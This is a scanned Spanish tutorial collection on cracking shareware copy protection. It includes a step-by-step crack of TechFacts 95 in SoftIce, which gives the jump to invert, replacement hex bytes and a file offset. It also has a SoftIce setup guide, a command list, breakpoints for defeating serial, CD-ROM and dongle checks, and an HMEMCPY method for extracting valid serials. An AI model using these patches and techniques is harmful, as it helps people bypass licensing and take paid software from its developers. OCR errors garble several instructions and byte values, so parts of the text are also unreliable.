una cantidad asociada, su código ASCII (p.e. par el acute0acutees el 30 en hexa o el 40 
en decimal). La técnica consiste en sumar el código de cada carácter y comprobar la 
suma (que a veces se llama checksum) con una cierta cantidad. Una variante es 
modificar el valor ASCII a través de una tabla que asocia a cada carácter un número 
distinto. 


¡Crackear esto es fácil de crackear: 


cmp suma,sumacorrecta ---->cmp suma,sumacorrecta 

JZ OK eononnonannonnn >jnz ok 

Es posible mezclar las tres técnicas, caracteres fijos, cheksum y modificación del código 
ASCII. En un capítulo próximo veremos un ejemplo de esto. 


b) En este caso se utiliza el nombre, los apellidos, o el nombre de la empresas o todo 
¡junto para generar un pwd. Aquí las técnicas son más imaginativas: coger cierto 
caracteres y repetirlos hasta llegar a un tamaño, usar el código ASCII de ciertas 
caracteres como índice de una tabla de encriptación...En fin, depende de las paranoias 
del programador. Lo cierto es que se debe generar la pwd correcta para nuestros dato 
y ésta se debe comparar con la introducida. Aquí es donde podemos atacar ,en al 
comprobación. Realmente no hace falta crackear, basta con copiar la pwd correcta e 
introducirla como nuestra pwd, o bien crackear las sentencias de comprobación para 
que sirva cualquier pass. Lo primero es mejor ya que nos servirá para futuras 
versiones. 


Se puede mezclar ambas técnicas, como veremos en un capítulo próximo, y generar un 
checksum para una cierta cadena extraída a partir de los datos del usuario y 
comprobar el cheksum de nuestra cadena. 


¿Cómo atacar? 


Antes de ir como unos desposeídos a reventar el programa, es totalmente necesario 
echar un vistazo, ver el posible esquema de protección y los posibles puntos de ataque. 
En general no hay que buscar mucho, los puntos débiles tiene un letrero rojo que dice '' 
Hey estoy aquí”. 


En el caso de los esquemas basados en números de serie, la cosa está clara: esos 
estúpidos mensajes recordatorios son la puerta de entrada. Si somos usuarios no 
registrados aparecen, si nos registramos desaparecen. Por tanto debe haber algo que 
indique cuando deben o no aparecer, este algo es un flag, que no es más que un 
conmutador (como el de una bombilla). Cuando está en ON aparecen los mensajes, 
cuando en OFF desaparecen. En nuestro contexto, un flag no es más que una posición 
dentro de la memoria con un cierto valor. La memoria del ordenador es como un 
cartón de huevos (1 huevo = 1 bit), donde cada hueco tiene un número diferente al que 
se le llama dirección de memoria. En cada hueco puede haber un huevo (valor 1) o no 
haberlo (valor 0). Los agujeros se agrupan, 8 agujeros es un Byte, 1024 Bytes es un 
MegaByte o MB, 1024 MB es un GigaByte o GB, 1024 GB es un TeraByte o TB. Fácil, 
¿verdad?. La memoria está compuesta de bits, estos bits se pueden interpretar de 
muchas formas, flags, datos, instrucciones. Por ejemplo 01010101 puede ser un flag de 
activación, la cadena ''hola'" o lo sentencia pinta la pantalla, depende de como lo 
consideremos. En el caso de tomarlo como instrucciones, se habla de dirección de la 
instrucción en memoria, que no es más que la dirección del primer del primer bit que 
la compone. 


El valor que podemos encontrar en un flag puede variar. Para ON podemos encontrar 
un 1 y para OFF un 0. Se puede usar la llamada lógica negada y tiene en ON un 0 y en 
OFF un 1. Todo lo que se pueda hacer con 0 y 1, se pude reconvertir cambiando los 0 
por 1 y los 1 por 0. Una "mejora" de los programadores es utilizar flags distintos a 0,1, 
cuán inteligentes!. Recuerdo cierto esquema que utilizaba el flag DEAD en 
hexadecimal. Los sistemas de numeración (como el hexadecimal o hexa para abreviar) 
son formas diferentes de contar y de representar cantidades. En base 10, la de toa la 
vida, se empieza en 0 y se acaba en 9. en hexa se comienza en 0 y se acaba en F 
(10=a,11=b,12=c,13=d,14=e,15=f). 


Veamos algo más práctico: 
cmp ax,flag; Compara el valor de ax con el valor del flag 
¡jz mensajes; Si son iguales muestra los mensajes. 


sigue: inc dx; Continúa normalmente. 


¡mp sigue;Salta y continua normalmente. 


Este puede ser un esquema típico. Dependiendo del valor del flag se muestran los 
mensajes o no. 


Llegamos a la parte interesante, cada mensaje recordatorio debe tener una 
comprobación como la del ejemplo. Basta con analizar los mensajes recordatorio y 
descubrir la dirección de memoria del flag. Pero quién narices rellena el flag?. 
Obviamente debe haber como mínimo dos inicializaciones, una al comienzo de la 
ejecución del programa que pone al flag a OFF y la rutina de protección que lo debe 
poner a ON si la pwd es correcta. ¿Me sigues hasta ahora?. 


Es fácil ahora saber donde atacar, un crack elegante sería poner la inicialización al 
comienzo del programa a ON en vez de OFF. Recuerda esto: ' Un buen cracker debe 
¡ser ante todo elegante y sutil, nada intrusivo". 


Otro punto de ataque 


Hasta ahora hemos visto que analizando los estúpidos mensajes se puede conocer la 
dirección de memoria del flag y a partir de ahí su inicialización. Pero en los esquemas 
basados en números de series existe un punto de entrada más claro aún que los flags: la 
propia rutina de protección. Veamos un método sencillo para llegar a ella. 


| 
¡Si uno se va a la opción de registro e introduce un número de serie falso, aparecerá una 
estúpida ventana indicando que nos hemos equivocado: ''Soryy your password is 
¡invalid'' o algo parecido que traducido al cristiano es '"Tío te ha equivocado, 
JAAARL". Esto no es una vía de entrada, esto es una autopista de 1GB de carriles. 
¡Basta con pensar un poco, quién es la encargada de mandar este mensaje? 
evidentemente la propia rutina de protección, interesante verdad?. Ya sólo queda 
encerrar la rutina, ver como trabaja , cambiar un par de bytes (siempre de la forma 
más elegante posible) y listo, programa crackeado. 


¡Comparación de ataques 


¡¿Qué crack es mejor?, el de flags o de la rutina de protección?. Esto depende en gran 
¡medida de programa, de tus habilidades y del tipo de que dispongas. Con la rutina de 
¡protección se puede analizar en profundidad el esquema, ver como trabaja y hasta 
extraer tu propio número de serie, osea el número de serie que la empresa te da si te 
registras, pero esto requiere tiempo y esfuerzo, obteniendo una satisfacción moral e 
intelectual. Además, en la próxima versión del programa est pwd posiblemente 
funcionará y no necesitarás crackear de nuevo. Mediante cracks al flag, se requiere un 
tiempo menor, pero la próxima versión habrá que crackearla de nuevo (no importa 
¡seguro que estos estúpidos programadores habrán seguido la mismo patrón de 
protección). Un crack a la rutina de exige un conocimiento profundo de la misma, lo 
¡que puede llevar a tu propio generador de claves (igualito o seguramente mejor que el 
tiene la empresa). 


CÓMO CRACKEAR TECHFACTS 95: 


Objetivo: TechFacts 95. 

Versión: 1.30 3/7/97 

¡Nombre del ejecutable: Teckfct95.exe 

Website: http://ourworld.compuserve.com/homepage/deansoft 
'Tamaño del ejecutable: 1.251.840 bytes. 

'Tipo de protección: Por número de serie. 

Dificultad: ameba. 

¡Tiempo de crackeo: 2 minutos. 

Herramientas: Softlce 3.0 y Editor Hexadecimal. 


¡Siguiendo las recomendaciones de +ORC empezaremos por crackear nuestras propias 
herramientas crack. El programa en cuestión es una pequeña joya que nos permitirá, 
entre otras muchas cosas, rastrear las acciones de un determinado programa, buscar 
¡cadenas de caracteres en ficheros, trabajar con dll.. Generalmente,lo utilizo para 
¡rastrear programas de instalación, obteniendo información de los ficheros creados, las 
entradas de registro añadidas o borradas, ... 


Manos a la obra. El programa es un ejecutable que no necesita otro fichero para 
funcionar (cosa rara en estos días). Así pues, arranquemos el programa veamos lo que 
ocurre. Aparece una horrible ventana diciendo que utilicemos nuestra VISA o 
MASTERCARD y que soltemos los 19,99 dólares (unas 2500 pesetas) que tenemos para 
ir a tomar cervezas. 


Echemos un vistazo al programa. Entre otras cosas, hay una opción en 
TOOLS/WATCH SYSTEM, que nos permite rastrear un programa. En HELP/HELP 
TOPICS/ORDER FORM aparece una hoja de registro en la que nos avisa de que 
además tenemos que paga 2 dólares para gastos de envío, ¡cómo si costará 250 pelas 
enviar un mail con el número de serie!. 


En HELP/ABOUT TECHFACTS 95 encontramos un botón USE REG KEY. Aquí es 
donde tenemos que introducir nuestro Nombre (First name), apellidos (Last name) y el 
número de serie correspondiente que lo recibiremos por mail si pagáramos 19,99 dólares 
más 2 dólares de gastos de envío. Empecemos por aquí. 


Pongamos un nombre, un apellido y un número cualquiera y pulsemos el botón 
REGISTER. Entonces escuchamos un pitido y aparece una ventana de mensaje diciendo 
REGISTRATION KEY FAILED. Ahora ¡pensemos un poco!, apliquemos un poco de 
ZEN CRACKING. 


Lo único anormal es el pitido. Si tu fueras un programador y quisieras que pitará tu 
"cacharro" tienes dos opciones construirte un bonito programa en ensamblador que lo 
haga, o bien utilizar una función de pitido presente en alguna de las vomitivas librerías 
de funciones, también llamadas API. ¿ Qué piensas que ha hecho nuestro ''vago" 
programador ?. ¡Bingo! ha utilizado la función MessageBeep de la librería 
USER32.DLL. Este un punto de ataque muy claro, aunque existen muchos otros. 


Apliquemos la técnica LIVE, es decir, utilizaremos el Softlce. Reinicialicemos nuestro 
ordenador en modo Ms-Dos, lancemos el WinlIce y volveremos a Windows. 


Abramos el LOADER de Softlce y en FILE/OPEN MODUL E seleccionemos el fichero 
Tekfct95.exe. Pulsemos Load o el botón con las ruedecillas dentadas. Nos aparece una 
ventana de mensaje del Softlce diciendo que no puede cargar la tabla de símbolos, 
pulsemos el botón SÍ y aparecemos directamente en el SoftIce con la pantalla en modo 
texto. En este momento nos encontramos en la primera sentencia de nuestro programa. 
Pulsemos bpx messagebeep con esto tomaremos el control antes de que aparezca el 
pitido. Con Ctrl-D volvemos a Windoce y el programa sigue ejecutándose normalmente 
pero con un cebo en messagebeep. Elegimos la opción de registro y escribimos cualquier 
cosa en nombre, apellidos y número de serie, pulsamos el botón y aparecemos de bruces 
en: 


USER32'MessageBeep 


/014F:BFF623C1 B148 MOV CL,48 **** Aparecemos aquí.**** 
014F:BFF623C3 EB12 JMP BFF623D7 

Si pulsamos en este momento F12(continuar hasta un RET) nos situaremos en: 
014F:0047BA65 EB11 jmp 0047BA78 

014F:0047BA67 6A30 push 00000030 

014F:0047BA69 E8S22A7F8FF Call 00406190 **** Llamada a MessageBeep**** 
014F:0047BA6E B8BCBB4700 mov eax, 0047BBBC 


014F:0047BA73 ES24BEFBFF call 0043789C **** Pintamos la ventana de error **** 
En tu ordenador las direcciones de memoria pueden ser diferentes. 


¡Sintamos el código!. Estamos en mitad de las sentencias de error, lo que implica que 
debe haber un salto condicional a este conjunto de sentencias de error. El salto debe ser 
condicional porque en caso de haber metido correctamente el número de serie 
¡habríamos obtenido algún tipo de mensaje de felicitación. Así pues, sólo debemos 
encontrar ese salto condicional y modificarlo. 


Miremos por encima de la dirección 014F:0047BA69, nos encontramos en 
014F:0047BA65 un salto incondicional jmp 0047BA78, en una ejecución normal nunca 
llegaríamos a 0047BA67 ya que siempre saltaríamos a 0047BA78. Por tanto, lo que 
debemos buscar es un salto condicional a la dirección 0047BA67. Si volvemos hacia atrás 
jun poco con los cursores encontramos este bonito salto 


014F:0047B934 ES9B73F8FF call 00402CD4 
014F:0047B939 0F8528010000 jne 0047BA67 **** ¡BINGO! +++ 
014F:0047B93F 8D45B7 lea eax, dword ptr [ebp-49] 


Hemos encontrado el salto, sólamente hay que modificarlo. Fijaos que el salto se produce 
después de una llamada a la rutina call 00402CD4 apostaría el pellejo a que esta es una 
rutina para comprobar si tu número de serie es correcto. Si no es igual (jne) salta a las 
sentencias de error. Si es igual continua ejecutándose. Hay muchas formas de invertir el 
salto: 


1.- Cambiar 0F8528010000 jne 0047BA67 por 
0F8500000000 jne 0047B93F 
2.- Cambiar 0F8528010000 ¡ne 0047BA67 por 


[404840484048 inc eax,dec eax, inc eax, dec eax, inc eax, dec eax 


La 1 es un salto neutro, sea igual o no siempre se ejecuta la sentencia siguiente. La 2 es la 
preferida por +ORC, cambia el salto por un conjunto de parejas incrementar - 
decrementar que dejan el registro eax sin cambios en su contenido. 


Solamente hay que tener en cuenta dos cosas para modificar el código, sustituir siempre 
el mismo número de bytes (cambias 2 bytes por 2 bytes) y que tus modificaciones sean 
una sentencia en ensamblador correcta. 


El Softlce nos permite hacer cambios On-Fly, es decir, en ese mismo instante, pero el 
¡cambio no es permanente. Para ello, nos vemos obligados a utilizar algún editor 
hexadecimal, con el cual abriremos el fichero ejecutable, y buscaremos la cadena en 
hexadecimal E89B73F8FF0F8528010000 y la cambiaremos por 
ES9B73F8FF0E8500000000. La cadena se encuentra en el offset 0X7AD34(los números 
en hexa llevan delante un 0X) que en decimal es 503092. 


Así pues tenemos que irnos al byte 503092 de fichero ejecutable y comenzar a hacer 
cambios. 


Ahora tendremos el ejecutable parcheado, si nos registramos nuestro número de serie 
¡siempre será aceptado. 


'Un crack no es más que un pequeño programa que abre un fichero y cambia un par de 
bytes por otros. ¡Nada más sencillo! Sólo hay que saber qué bytes hay que cambiar. 
Cuantos menos bytes se cambien más elegante será el crack. 


¡Si habéis seguido todos los pasos habéis crackeado vuestro primer programa. Aun nos 
¡sois cracker pero estáis en la buena senda. Sólo hay que poner interés. 


¡Para gentes más avezadas, comentaré que el flag de activación se iniciativa 
correctamente en :0047BA5E mov byte ptr [004CF31A],00 La rutina de protección es 
bastante patética, con gran cantidad de código inactivo. Empieza en :47B5C0. 
Obviamente se podría haber hecho algún otro tipo de pero este es el más simple (se 
podría haber obtenido el número de serie real, o haber creado un generador de 
claves).El programador ha puesta a "pelo" la dirección de retorno en :47BA3F push 
47BA54. Es un ridículo truco que nos hará perdernos si continuamos ejecutando 
¡mnormalmente, por ello es conveniente pulsar ''F12'" y mirar hacia por encima sin 
ejecutar sentencias. 


Espero vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 
¡En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +0RC en la red. 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Instalación del Soft-Ice 3.22 para W95 


e Tener el Softlce 3.20, y la actualización a la versión 3.22 (ver sección de 
hErrAmiEntAs para conseguirlos) 


e Ejecutar el programa de instalación (3.20), y cuando lo pida, decirle que 
no actualize el Autoexec.Bat, ya que es mejor hacerlo después a mano. 
e Ejecutar el programa de actualización (3.22). 


e Editar el AutoExec.Bat, y añadir al final : 
CHOICE /T:N,3 "Cargar Debugger Soft-Ice 3.22 " 
IF ERRORLEVEL 2 GOTO SEGUIR 
CASTWOSWINICE.EXE 
¡SEGUIR 


e Al arrancar el Pc, tendremos 3 segundos para contestar si queremos cargar 
el Softlce. 
(Se puede cambiar el tiempo y/o la opción por defecto con el parámetro 
/T:OpcionDefecto,Segundos ) 
Si hemos pedido cargar el debugger, el windows arrancará normalmente, 
pero al pulsar Ctrl-D tiene que aparecer el entorno del debugger, y a partir 
de aquí ya es otra historia.... 


e Para ejecutar el Softlce desde una "ventana" de guindous, hay que activar 
la casilla de Universal Video Driver, cuando se configura la targeta 
gráfica. 

Se puede volver a reconfigurar con el "Display Adapter Setup" que se 
instala juntamente con el Softlce, y dejarlo como mejor nos vaya. 


Configuración del entorno (WinIce.Dat) 


Los parametros de configuración estan en el fichero Winlce.Dat, y se puede acceder a ellos también 
desde el pgm Symbol Loader, en la opción de SoftICE Initialization Settings. 


Algunos comandos se pueden teclear directamente desde el Softlce, o se pueden tener en el 
WinIce.Dat para que se ejecuten al arrancar. 
Probad primero, y lo que más os interese lo poneis en la linia INTT="X;" 


CODE ON : Para ver los bytes en hexa de cada instrucción asm. 
LINES %+ : Número de linias para la pantalla. 

WR : Para ver/ocultar la ventana de Registers. 

WL : Para ver/ocultar la ventana de Locals. 

WC $ : Número de linias para la ventana de Code. 

WD * : Número de linias para la ventana de Data. 

WW * : Número de linias para la ventana de Watch. 


Un ejemplo de configuración podría ser : 
INIT="CODE ON;¿LINES 60;WR;WL;WD 13;WC 25;WATCH eax;¿WATCH *eax;¿X;¿" 


Estando en el Softlce, el tamaño de las ventanas también se puede modificar con el ratón. 
Y también se pueden cambiar los colores con el comando COLOR 


Configuración del entorno (WinIce.Dat) 


Para poder interceptar llamadas a funciones externas del programa que estamos 
traceando, hay que retocar unas linias en el WinIce.Dat 

Se tienen que "exportar" los ficheros que contengan las funciones que queramos 
pillar. Los típicos que conviene tener para interceptar las llamadas al Api de 
windows son : 


EXP=c:windowsAsystemlkerne1l32.d11 
EXP=c:windows1systemluser32.d11 
EXP=c:windowsAsystemlgdi32.d11 
EXP=c:windowssystemladvapi32.d11 


Estas linias las vereis en el WinIce.Dat, pero con un puntoycoma delante que las 
inactiva. 
Tan sólo quitar el ; y retocar el path del windows si no se ajustase a vuestro Pc. 


Sin estos "Exports", no se podria poner un BreakPoint tipo BPX 
GetWindowTextA, que son muy útiles para bastantes desprotecciones. 


> y 
VO 


Traceando .... 


Tenemos varias opciones para ir avanzando por el programa : 


T (F8): Ejecuta la instrucción actual y se para en la siguiente. 
P (F10): Igual que T, pero no entra en los Call. 

P RET (F12): Ejecuta hasta una instrucción de retorno (RET). 

G address (F11): Ejecuta hasta la dirección 'address'. 


Husmeando .... 


Para poder ver o buscar lo que hay en memoria : 


D address [L length] : Muestra el contenido de la memoria. 
S address L length data-string: Busca un valor en la memoria RAM. 


Ejemplos : 

D EAX => para ver qué hay en EAX 

D *EAX => para ver qué hay en la dirección que apunta EAX 
D EBP-200 ==> para ver qué hay en EBP-200 

D 000F:A8A57 ==> para ver qué hay en la dirección F:A8A57 


S 0 L FFFFFFFF 'clave' => Busca el texto 'clave' por toda la memoria. 
S 0 L FFEFFFFFF A1,41 => Busca 'A141' en hexadecimal por toda la memoria. 
S es:di+10 L ecx A1,41 => Busca 'A141' en hexa. desde es:di+10 hasta (es:di+10)+ ecx 


- 
Vi 


El uso de los BreakPoints, o Puntos de Ruptura es muy útil para parar el programa en 
un momento dado. Ponerlos bien significa ahorrarse ver muchas linias de código 
inútil. 

Para manipular los BreakPoints tenemos : 


Parando .... 


BL : Muestra los BreakPoints que hemos puesto. 


BD % : Desactiva el BreakPoint número *+ (* para todos). 
BE % : Activa el BreakPoint número + (* para todos). 
BC %* : Elimina el BreakPoint número *+ (* para todos). 


Algunos de los BreakPoints disponibles son : 


BPX address/symbol : Parada por ejecución. 

BPIO [-h] port [R|W|RW] : Parada por acceso a puerto E/S. 
BPINT interrupt-number : Parada por interrupción. 

BMSG hWnd [L] begin-msqg : Parada por mensaje. 

BPM address : Parada por acceso a memoria. 


Para ver ejemplos y coger ideas de Puntos de Ruptura, ver el documento de 


BreakPoints. 
- 
Vi 


Pidiendo .... 


Con el Softlce disponemos de varios comandos para obtener información del Sistema. 
Por ejemplo, 


WMSG : Muestra los mensajes de windows. (wm_gettext, wm_lbuttondown,.. 


TASK : Muestra las tareas actualmente en ejecución. 
HWND nombreTask : Muestra información sobre los "windows handles". 
EXP : Muestra/Carga las funciones "exportadas" de las DLlLs. 


Supongamos que queremos interceptar qué se hace con una clave que acabamos de introducir en un 
programa. 

Se podría hacer (entre otras maneras) : 

TASK => para ver el nombre del programa. 

HWND nombrePgm => para ver que apuntadores hay para ese programa. 

BMSG apuntador mensaje ==> para poner un BreakPoint. 


Ej: interceptar para la tarea prueba32, el "Window-Handle" 2C0 (Class_Name: Edit, que corresponde al 


cuadro de texto) 
HWND prueba32 
BMSG 2C0 wm_gettext 
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Comandos existentes en el SoftIce 3.22 


SETTING BREAK POINTS 


BPM, BPMB, BPMW, BPMD 
- Breakpoint on memory access 


BPR - Breakpoint on memory range 
BPIO - Breakpoint on 1/0 port access 
BPINT - Breakpoint on interrupt 

BPX - Breakpoint on execution 

BMSG - Breakpoint on Windows message 
BSTAT - Breakpoint Statistics 

CSIP - Set CS:EIP range qualifier 


MANIPULATING BREAK POINTS 


BPE - Edit breakpoint 

BPT - Use breakpoint as a template 
BL -= List current breakpoints 

BC - Clear breakpoint 

BD - Disable breakpoint 

BE - Enable breakpoint 

BH - Breakpoint history 


DISPLAY/CHANGE MEMORY 


R - Display/change register contents 
U - Un-assembles instructions 
D, DB, DW, DD, DS, DL, DT 
- Display memory 
E, EB, EW, ED, ES, EL, ET 


- Edit memory 


PEEK - Read from physical address 

POKE - Write to physical address 

PAGEIN -— Load a page into physical memory (note: not always safe) 
H - Help on the specified function 

? - Evaluate expression 

VER - SoftICE version 

WATCH -— Add watch 


FORMAT - Change format of data window 
DATA Change data window 


DISPLAY SYSTEM INFORMATION 


GDT - Display global descriptor table 

LDT - Display local descriptor table 

IDT - Display interrupt descriptor Table 
TSS - Display task state segment 

CPU - Display cpu register information 
PCI - Display PCI device information 

MOD - Display windows module list 

HEAP - Display windows global heap 

LHEAP  - Display windows local heap 

VXD - Display windows VxD map 

TASK - Display windows task list 

VCALL - Display VxD calls 

WMSG - Display windows messages 

PAGE - Display page table information 

PHYS - Display all virtual addresses for physical address 
STACK -— Display call stack 

XFRAME - Display active exception frames 
MAPV86 - Display v86 memory map 

HWND - Display window handle information 
CLASS -— Display window class information 
VM - Display virtual machine information 
THREAD - Display thread information 

ADDR - Display/change address Contexts 
MAP32 -— Display 32 bit section map 

PROC - Display process information 

QUERY -— Display a processes virtual address space map 
WHAT - Identify the type of an expression 


OBJDIR - Display info about an object directory 
DEVICE - Display info about a device 


DRIVER - Display info about a driver 
FOBJ - Display info about a file object 
IRP - Display info about a IRP 


I/O PORT COMMANDS 


1, IB, IW, ID 
- Input data from 1/0 port 
O, OB, OW, OD 
-— Output data to I/O port 


FLOW CONTROL COMMANDS 


Xx - Return to host debugger or program 

G - Go to address 

T - Single step one instruction 

P - Step skipping calls, Int, etc. 

Go to current cursor line 

EXIT - Force an exit to current DOS/Windows program 
GENINT Generate an interrupt 

HBOOT System boot (total reset) 


paa 

H 

ps) 

H 
l 


l 


MODE CONTROL 


I1HERE - Direct INT1 to SoftICE 
IBHERE - Direct INT3 to SoftICE 


ZAP - Zap embedded INT1 or INT3 
FAULTS - Enable/disable SoftICE fault trapping 
SET - Change an internal variable 


CUSTOMIZATION COMMANDS 


PAUSE - Controls display scroll mode 

ALTKEY - Set key sequence to invoke window 

FKEY - Display/set function keys 

DEX - Display/assign window data expressions 
CODE - Display instruction bytes in code window 
COLOR - Display/set screen colors 

ANSWER -— Auto-answer and redirect console to modem 
DIAL - Redirect console to modem 


SERIAL - Redirect console 


TABS - Set/display tab settings 

LINES -— Set/display number of lines on screen 
WIDTH - Set/display number of columns on screen 
PRN - Set printer output port 

PRINT-SCREEN key - Dump screen to printer 

MACRO - Define a named macro command 


UTILITY COMMANDS 


A - Assemble code 

S - Search for data 

F - Fill memory with data 
M - Move data 

E - Compare two data blocks 


LINE EDITOR KEY USAGE 


(Up) -= Recall previous command line 
(Down) -— Recall next command line 
(Right)- Move cursor right 

(Left) - Move cursor left 


BKSP - Back over last character 


HOME 
END 
INS 
DEL 
ESC 


Start of line 

- End of line 

- Toggle insert mode 

- Delete character 

- Cancel current command 


SCROLLING KEY USAGE 


PageUp - Display previous page of display history 
PageDn - Display next page of display history 
A1t- (Up) = Scroll data window down one line 
Alt-(Down) - Scroll data window up one line 
Alt-PageUp - Scroll data window down one page 
Alt-PageDn - Scroll data window up one page 
Ctrl-PageUp - Scroll code window down one page 
Ctrl-PageDn - Scroll code window up one page 

Ctr1- (Up) -= Scroll code window down one line 


Ctrl1- (Down) 


Scroll code window up one line 


WINDOW COMMANDS 


- Toggle code window 

- Toggle data window 

- Toggle floating point stack window 
- Toggle locals window 

- Toggle register window 

- Toggle watch window 

- Enable/disable code window 

- Locate current instruction 


WINDOW CONTROL 


RS 
ALTSCR 
FLASH 


- Clear window 

-— Restore program screen 

- Change to alternate display 
Restore screen during P and T 


SYMBOL/SOURCE COMMANDS 


SYM 
SYMLOC 
EXP 
SRC 
TABLE 
FILE 
SS 
TYPES 
LOCALS 


- Display symbols 

- Relocate symbol base 

- Display export symbols 

- Toggle between source, mixed € code 

- Select/remove symbol table 

- Change/display current source file 

- Search source module for string 

-= List all types, or display type definition 
- Display locals currently in scope 


BACK TRACE COMMANDS 


SHOW 
TRACE 


- Display from backtrace buffer 
- Enter back trace simulation mode 


XT - Step in trace simulation mode 


XP - Program step in trace simulation mode 
XG - Go to address in trace simulation mode 
XRSET -— Reset back trace history buffer 


SPECIAL OPERATORS 


- Preceding a decimal number specifies a line number 


S - Preceding an address specifies SEGMENT addressing 
$ - Preceding an address specifies SELECTOR addressing 
Q - Preceding an address specifies indirection 

Went 
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Introducción 


Una de las habilidades más importantes para desproteger un programa es saber 
Dónde, Cuándo y Qué Tipo de BreakPoints usar. 

En caso contrario, acabas perdido entre cientos de lineas de código, sin poder 
encontrar la rutina de protección buscada. 


Las posibilidades de BreakPoints son infinitas, pero hay algunos que se usan 
frecuentemente para las desprotecciones. 


Tener en cuenta si el programa debugado es de 16 o 32 bits para los Puntos de 
Ruptura en las llamadas al Api de windows. 

Por ejemplo, BPX GetWindowText (para 16 bits) y BPX GetWindowTextA (para 
32 bits). 

O sea, que los programas para W95 de 32 bits llevan la A al final. 


> 
Wer 


Ejemplos de BreakPoints útiles para el cracking 


1)General Purposes 
BPX messagebox 

BPX getdlgitemtext 
BPX getwindowtext 
BPX hmemcpy 

BPX showwindow 

BPX updatewindow 
BMSG XXXX wm_gettext 
BMSG XXXX wm_command 
BMSG XXXX wm_move 


2) Time Related 

BPINT 21 if ah==2A (DOS) 
BPX getlocaltime 

BPX getfiletime 

BPX getsystemtim 


3)Register Flag Related (e.g. Flag on EAX) 


BPX cs:eip if EAX==0 (SICE 3.x) 


4) Memory Flag Related (e.g. Flag on 0030:000045AA) 


BPMB cs:eip rw if 0x30:0x45AA==0 (SICE 3.x) 


5) "Hear The Echo" Technique Related 


BPX 0x30:0x45AA do "d 0x30:0x44BB" (SICE 3.x) 
BPX CS:0x66CC do "? EAX" (SICE 3.x) 


6) CD-ROM and Disk Based Schemes 


BPINT 13 if ah==2 (DOS) 
BPINT 13 if ah==3 (DOS) 
BPINT 13 if ah==4 (DOS) 


BPX GetFileAttributesA 

BPX GetFileSize 

BPX GetDriveType 

BPX GetLastError 

BPX ReadFile 

BPIO -h (Your CD-ROM Port Address) R 


7)Dongle Cracking 
BPIO -h 278 R 
BPIO -h 378 R 


BPINT 21 if ah==3dh (DOS) 
BPINT 31 if ah==3fh (DOS) 


BPINT 21 if ah==3dh (DOS) 
BPX ReadFileA 
BPX CreaterFileA 


9)Keyboard Input Related 


BPINT 16 if ah==0 (DOS) 
BPINT 21 if ah==0xA (DOS) 


Nota: Texto original en inglés de Aesculapius 
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1- ¿Que es HIMEMCPY? 


HMEMCPY es una API de Windows, que utiliza la memoria RAM para leer, manipular, comparar y 
almacenar cadenas (texto que introducimos cuando un programa nos pide el numero de serie por 
ejemplo). La funcion recoge la informacion que le proporcionamos y la carga en memoria. Despues 
manipula esas cadenas, las mueve y las compara (por ejemplo compara tu numero de serie con el 
correcto), y despues decide si la cadena es o no la correcta. 

La funcion HMEMCPY devuelve esta informacion al programa en cuestion, y si has puesto el serial 
correcto te lo aceptara o de lo contrario te mostrara una bonita ventana de error. 


2- ¿Para que nos sirve a los Crackers HIMEMCPY? 


HMEMCPY se puede utilizar para "cazar" numeros de serie validos en programas shareware. 
Utilizando un debugger (depurador) como el Softlce, podemos poner un breakpoint en HMEMCPY 
para que el programa se pare y nos avise cuando llama a la funcion. Muchos programas shareware 
utilizan HMEMCPY para comparar numeros de serie, sobre todo cuando han sido escritos en Delphi o 
en Visual Basic. 


3- ¿Como preparar el Softlce para pararnos en HMEMCPY? 


Cargamos nuestra "victima" y vamos a la ventana de registro, donde normalmente se nos pedira un 
nombre y un numero de serie. Suele haber un boton que se debe pulsar para validar los datos una vez 
introducidos. Pues bien, si existe el boton procedemos de la siguiente forma: 


Rellenamos los datos, nombre y serial cualquiera. Vamos al Softlce y ponemos un breakpoint en 
HMEMCPY, para lo cual escribimos " BPX HMEMCPY ". Lo que estamos haciendo es indicarle al 
Softlce que se pare y nos avise cuando nuestra "victima" llame a HAMEMCPY. 


Una vez puesto el breakpoint, pulsamos Ctrl+d para volver al programa. Pulsamos el boton de registro 
y volveremos al Softlce. Bien, ahora si suponemos que los datos que nos pedian solo eran dos, el 
nombre y el numero de serie..... necesitamos pulsar una vez Ctrl+D (o F11, es lo mismo) puesto que si 
no lo hacemos estaremos siguiendole la pista al nombre y no es lo que nos interesa. :0) 


Si no existe el boton de registro: 
Ponemos el BPX antes de introducir el ULTIMO caracter de nuestro serial falso. 


Ahora si que estamos en el camino correcto (bueno, casi). Si te fijas, en el Softlce veras una linea 
encima de la ventana de comandos que pone el nombre del programa en el que estas. En nuestro caso 
lo usual sera que veas algo como: "USER(0A)" o "(USER(01)" pues esta parte no nos interesa para 
nada, tenemos que llegar al codigo de nuestra "victima". Para lo cual pulsamos F12 unas cuantas veces 
hasta que veamos el nombre de nuestro programa en cuestion, lo cual nos indicara que estamos dentro. 
Si por ejemplo el programa se llama "victima" veremos algo como "VICTIMA!CODE". 


4- ¿Que podemos buscar? 


Una vez que estamos dentro del codigo de nuestra "victima", tenemos que buscar una comparacion 
(CMP, TEST) y/o un salto condicional (JE, JNE, JZ, JNZ...etc). Si encuentras una comparacion y 
despues un salto, lo mas probable es que sea una zona muy muy interesante. 


Un ejemplo: 

CALL XXXXXXXX 

MOV EAX, [EBP-14] ¡EAX contiene el serial que introducimos 
MOV EDX, [00463A56] ¡EDX contiene el serial CORRECTO 

CALL XXXXXXXX ¿Llamada a una rutina para compararlos 
JNZ 0047FCA4 ¿Si es correcto salta a REGISTRADO (si no es cero) 
MOV EAX,00466F34 ¿Si es cero no estamos registrados 

CALL XXXXXXXXX 

JMP 0047FCCC 

MOV EAX, 004738D4 

MOV EDX,00466F7C 

CALL XXXXXXXX 


Esta rutina es bastante tipica, aunque obviamente hay muchas variantes. :0) 

Para "cazar" nuestro serial en este ejemplo, necesitamos situarnos sobre la linea "MOV EDX,[00463A56]" , ahora 
vamos a ver que diablos contiene el registro EDX para lo cual escribimos en el Softlce "D EDX". NUESTRO SERIAL 
CORRECTO !!! 


Otra rutina bastante comun seria algo similar a esto: 


PUSH EAX 

CALL XXXXXXXX ¡Llamada a una funcion que calcula nuestro serial Correcto 
ADD ESP, 04 ¿y lo almacena en memoria 

TEST EAX, EAX ¿Compara nuestro serial con el Correcto 

JNZ 00440994 ¡Si no es cero salta a REGISTRADO 


PUSH 
PUSH 
PUSH 
CALL 


0047B52B ¡Nuestro serial Correcto 
64 

EBX 

XXXXXXXX 


